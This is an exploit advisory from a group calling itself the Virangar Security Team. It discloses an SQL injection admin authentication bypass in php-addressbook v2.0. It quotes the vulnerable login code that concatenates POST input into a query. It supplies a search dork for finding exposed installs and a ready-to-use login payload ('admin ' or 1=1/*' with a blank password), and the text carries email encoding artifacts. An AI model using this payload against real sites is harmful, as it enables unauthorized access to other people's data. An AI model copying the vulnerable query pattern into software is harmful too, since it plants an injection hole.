|
########################################################################=0D
# #=0D
# php-addressbook v2.0 SQL Injection Vulnerbility #=0D
# [admin Authentication bypass] #=0D
########################################################################=0D
=0D
Virangar Security Team=0D
=0D
www.virangar.org=0D
www.virangar.net=0D
=0D
--------=0D
Discoverd By : hadihadi =0D
=0D
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra=0D
=0D
& all virangar members & all iranian hackerz=0D
=0D
greetz:to my best friend in the world hadi_aryaie2004=0D
& my lovely friend arash(imm02tal) from emperor team :)=0D
-----------------------------------=0D
dork: =A9 php-addressbook v2.0=0D
-----------------------------------=0D
vuln code in index.php:=0D
line 26:$username = $_POST['username'];=0D
ine 27:$password = $_POST['password'];=0D
and line 28:=0D
$sql = "SELECT * FROM $usertable WHERE username='$username' AND password=PASSWORD('$password')";=0D
=0D
-----------------------=0D
vuln:=0D
login:admin ' or 1=1/*=0D
password:[blank]=0D
-------------------------------------=0D
tnx: all hackerz =0D
=0D